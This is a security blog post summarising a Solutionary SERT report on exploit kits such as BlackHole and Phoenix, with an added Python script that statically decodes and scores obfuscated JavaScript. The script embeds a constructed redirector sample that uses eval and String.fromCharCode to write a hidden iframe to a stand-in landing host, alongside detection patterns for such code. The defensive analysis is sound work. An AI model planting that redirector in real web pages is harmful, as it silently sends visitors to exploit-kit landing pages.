Categories: Cyber Crime, Malware

The rise of exploit kits according to Solutionary SERT

Today I want to discuss a very interesting study by Solutionary's Security Engineering Research Team (SERT), which shared the results of an analysis of malware and exploit kit diffusion observed through its ActiveGuard service platform.

The platform has collected and analyzed malicious events that hit the company's clients globally, and the data were provided to SERT to paint the overall threat landscape. The study revealed that, despite a 15% drop in event volume in the categories of Authentication Security, Distributed Denial of Service (DDoS) and Reconnaissance, the threat represented by exploit kits is growing.

The report revealed the surprising effectiveness of well-known vulnerabilities usually included in the popular exploit kits sold in the underground: around 60% of the vulnerabilities they target are more than two years old, and 70% of the exploit kits analyzed (26 in total) were released or created in Russia.

The figure is even more significant considering that China, in second place, accounts for only 7.7%. The most popular and pervasive kit is BlackHole 2.0, which exploits fewer vulnerabilities than other kits do, while the most versatile is the Phoenix exploit kit, which supports 16 percent of all the vulnerabilities being exploited. Over 18% of the malware instances detected were directly attributed to BlackHole, a web application that exploits known vulnerabilities in popular applications, frameworks and browser plugins such as Adobe Reader, Adobe Flash and Java.

The data highlights the inadequacy of the patch management processes of private businesses that don't update their systems promptly; in many cases entire infrastructures aren't updated for a long time, and for this reason they are still vulnerable to old exploit code dating back to 2004.

The phenomenon is really worrying. Cyber security is crucial to the survival of any company and of its business partners, yet we are faced with a lack of security culture: security is still perceived as a cost, and the global crisis is aggravating the situation.

The report states:

“SERT continuously performs batch analysis of malware variants received through various means, with much of the intense examination being left for particularly serious threats. As indicated by the accompanying chart, a majority (67%) of malware is not detected by anti-virus or anti-malware software. Although specific insights require close examination, trending from batch analysis can often provide a high-level perspective that is critical for strategic enterprise security planning.”

The use of exploit kits is also demonstrated by the number of instances detected: 30% of the samples analyzed were traced back to JavaScript malware variants used for redirection, obfuscation and encryption, all functionality provided by the popular malicious kits.
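To make concrete what the JavaScript redirectors mentioned above look like to an analyst, here is an added example that is not part of the SERT report or of the original article: a small Python triage script that statically folds String.fromCharCode() arrays back into text, without executing the script, and flags the indicators typical of kit landing pages (eval, a long numeric array, a hidden 1x1 iframe written into the document). The two samples, the domain landing.example.invalid and the indicator threshold are constructed for the illustration and are not taken from the report.

```python
"""Static triage of JavaScript samples for exploit-kit style redirector traits.

Added illustration: the indicator set and the threshold below are the author's
own choices for the example, not figures from the Solutionary SERT report.
"""
import re
from typing import Any, Dict

# Constructed samples, not real malware. The redirector is generated here from
# a plaintext payload so that the character-code array is exactly what a
# String.fromCharCode()/eval() loader would carry.
BENIGN_JS = """
function initMenu() {
  var items = document.querySelectorAll('.menu li');
  for (var i = 0; i < items.length; i++) {
    items[i].addEventListener('click', toggleItem);
  }
}
"""

_PAYLOAD = ('document.write(\'<iframe src="http://landing.example.invalid/gate.php" '
            'width=1 height=1 style="visibility:hidden"></iframe>\');')
OBFUSCATED_JS = ("var q=String.fromCharCode(%s);eval(q);"
                 % ",".join(str(ord(c)) for c in _PAYLOAD))

_FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)")
# An iframe with a 0/1 pixel dimension or hidden visibility: the classic way a
# landing page is pulled in without the visitor noticing.
_HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?[01]\b|"
    r"<iframe\b[^>]*visibility\s*:\s*hidden", re.IGNORECASE)


def decode_fromcharcode(js: str) -> str:
    """Fold String.fromCharCode(n, n, ...) calls into string literals.

    Purely textual: nothing is evaluated. Calls whose arguments are not a
    plain list of integers (or exceed the Unicode range) are left untouched.
    """
    def _fold(m: "re.Match[str]") -> str:
        codes = [int(x) for x in m.group(1).replace(" ", "").split(",") if x]
        if any(c > 0x10FFFF for c in codes):
            return m.group(0)
        return repr("".join(chr(c) for c in codes))
    return _FROMCHARCODE.sub(_fold, js)


def score_sample(js: str) -> Dict[str, Any]:
    """Return the indicators found in a sample plus a coarse verdict.

    The decoded text is searched for the payload-level indicators so that a
    document.write() or iframe hidden inside the numeric array still counts.
    """
    decoded = decode_fromcharcode(js)
    result: Dict[str, Any] = {
        "eval": bool(re.search(r"\beval\s*\(", js)),
        "fromcharcode": bool(_FROMCHARCODE.search(js)),
        "unescape": bool(re.search(r"\bunescape\s*\(", js)),
        "document_write": bool(re.search(r"document\.write\s*\(", decoded)),
        "hidden_iframe": bool(_HIDDEN_IFRAME.search(decoded)),
        # 40+ consecutive small integers: encoded payload rather than data.
        "long_numeric_array": bool(re.search(r"(?:\d{1,3}\s*,\s*){40,}\d{1,3}", js)),
    }
    hits = sum(1 for v in result.values() if v is True)
    result["hits"] = hits
    result["verdict"] = "suspicious" if hits >= 3 else "benign"  # illustrative threshold
    result["decoded"] = decoded
    return result


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_JS), ("redirector", OBFUSCATED_JS)):
        r = score_sample(sample)
        print(f"{name}: {r['verdict']} ({r['hits']} indicators)")
        if r["verdict"] == "suspicious":
            print("  decoded:", r["decoded"])
```

The folding step is deliberately static; running attacker JavaScript, even in a sandbox, is a separate decision with its own risks, and for the simple loaders described here a textual decode is enough to recover the redirect target and the hidden iframe.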

The figures are very worrying. New vulnerabilities are discovered with impressive frequency, and the trend observed in recent months shows a very active and prolific market for the commercialization of 0-day vulnerabilities; in many cases dedicated exploit kits are sold directly in the underground market, and once again the Russian underground is the most active in this sense.

“With a large concentration of exploit kits focusing on client-side exploitation (targeting desktop and end-user applications), organizations must pay close attention to patch management and endpoint security controls. Although these controls alone will not stop all attacks, they will significantly decrease the attack surface and reduce the overall likelihood of compromise.”

As revealed in the report, a large number of exploit kits focus on client-side exploitation (targeting browsers, desktop and end-user applications). For this reason alone, companies, organizations and individual users should pay close attention to keeping their security patches and antivirus software up to date.

Pierluigi Paganini

Pierluigi Paganini is a member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and of the Cyber G7 Group; he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years' experience in the field and is a Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to found the security blog "Security Affairs", recently named a Top National Security Resource for the US. Pierluigi is a member of "The Hacker News" team and writes for major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and many other security magazines. He is the author of the books "The Deep Dark Web" and "Digital Virtual Currency and Bitcoin".
